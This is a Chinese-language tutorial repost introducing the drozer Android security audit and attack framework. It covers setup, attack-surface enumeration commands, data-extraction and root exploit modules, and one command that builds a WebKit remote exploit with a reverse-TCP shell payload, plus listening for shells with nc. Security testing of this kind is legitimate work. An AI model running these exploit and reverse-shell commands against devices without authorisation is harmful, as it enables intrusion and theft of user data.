分享

Android安全审计与攻击框架—-drozer全功能介绍

 5与时间为敌 2015-02-28
  提醒:点上方↑“黑客技术”即可免费订阅我。

  软件官网链接:https://www./products/drozer/

  最近keen team发了一段吊丝逆袭女神视频,利用android某狗输入法的漏洞远程获取实时键盘输入,里面用到了nc和drozer,nc就不多说了,今天介绍一下drozer

  drozer是个好东西,虽然现在分为免费和专业版,但专业版也就增加了GUI界面之类的无关痛痒的东西,下面逐一介绍一下drozer的各种姿势

  使用前应保证下面的东西都安装完毕:

  Java Runtime Environment (JRE) or Java Development Kit (JDK)

  Android SDK

  adb路径正确

  java路径正确

  1.以win平台为例,下载安装包,下载好后压缩包内如图;


  setup是装win上的,agent是装手机上的,装上后如图,打开屏幕下方的开关


  win上安装后在cmd下打开drozer.bat,会这样:


  这是用来连接手机上安装的agent滴

  下一步需要让电脑连上手机的agent,上面的图中可以看到手机端默认端口开启的是31415,在电脑上cmd下输入:

  adb forward tcp:31415 tcp:31415

  正常情况应该是这样:


  OK,准备工作完成,接下来可以开搞了

  2.在安装目录cmd下输入连接命令drozer.bat console connect或在adb下输入drozer console connect,如图:


  先介绍基础功能,应用信息获取,先找应用名,命令为: run app.package.list -f XXXX(关键字)

  找到后能看到应用全名,然后输入命令来查看该应用信息: run app.package.info -a XXXXX(应用名),如图:


  图中有中文乱码,而且java有点问题,请忽略。这样可以看到各种信息,包括权限、id、路径之类的

  OK,进行下一步

  run app.package.attacksurface XXXXX(应用名)

  这个命令是查找应用的IPS漏洞的,执行后如图:


  找到了3个可以外部调用的activities,而其他的选项都是相关的外部调用,具体利用可参考非虫的《android软件安全与逆向分析》

  既然找到问题了,就可以直接利用,但能不能找到有用的信息还是要慢慢分析的,利用命令可以在下面的命令列表中找到,具体命令格式可在命令前加help查看,如图:


  命令列表:

  app.activity —-查找与利用app的外部调用接口

  app.broadcast—-查找与利用app的外部广播接收者

  app.package—-寻找设备上的应用包,并获取他们的详细信息

  app.provider—-查找与利用app的内容提供者

  app.service—-查找与利用app的外部调用服务

  auxiliary—-已经被移植到drozer的有用的工具

  exploit.pilfer—-通过不受保护的内容提供者或sql注入提取敏感信息(其实就是exp了)

  exploit.root —-公共root exploit

  information—-显示有关一设备的额外信息

  scanner—-自动扫描常见漏洞(例如:run scanner.provider.finduris -a com.manyi.lovehouse)

  shell—–与Linux底层交互

  tools.file—-拷贝文件进设备/出设备

  tools.setup—-在设备上安装程序,包括busybox

  OK,以上是直连模式的应用,除了直连模式,还有一种infrastructure mode连接模式,其实就是反向连接了,需要在pc和android上配置一下IP和账号密码,还可以SSL哦~

  PC端需要在cmd下输入:

  drozer.bat server start

  若想加上认证的话就输入:

  drozer.bat server start –-credentials username password (自定义的账号密码)

  而在android上的agent客户端上的设置,需要进入右上角的setting—new endpoint里面设置PC的ip和自定义的账号密码以及端口 端口默认就是31415.如图:


  设置完后点击save保存,回到程序主界面就可以连接了,连接上PC之后用法就与上面相同了。这个方法适合网络环境比较复杂的远程连接(花生壳你懂的)。除了反向连接,在wifi环境下还可以正向远程连接,在PC端的命令是:drozer.bat console connect –server XXXXX:31415 (XXXX为手机IP)

  3.下面介绍一下drozer的Exploits模块

  在PC的cmd模式下输入exp查看命令可以看到已有的exp: drozer.bat exploit list

  查看可用的shell: drozer.bat shellcode list

  发一个利用的命令作为参考:

  drozer.bat exploit build exploit.remote.webkit.nanparse weasel.reverse_tcp.armeabi –credentials username password –server 10.0.2.2:31415 –push-server

  成功之后输入命令查看是否已连接:drozer.bat console devices

  drozer提供了一个叫weasel的小程序在漏洞利用成功后进行反向连接,上面的例子就用到了weasel,不过当weasel无法成功使用的时候,我们也可以用nc来监听本地端口获得shell,keen团队94.

  4.模块安装功能,drozer提供了安装新模块的功能,这让drozer有了新的活力,而新模块都是放在Github上的dorzer项目上面,大家可以去下载学习,下面看一下具体使用命令.

  搜索模块:module search XXXX (关键字)


  查看模块说明:module search XXXX(模块名) -d

  安装模块: module install XXXX(模块名)

  drozer的功能大概就这么多了,不过都是基本使用方法,多一块积木总是好的嘛,若有描述不当之处,请不吝赐教。

  ——————————

  关注微信号:hackdig 学习最新黑客技术!

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多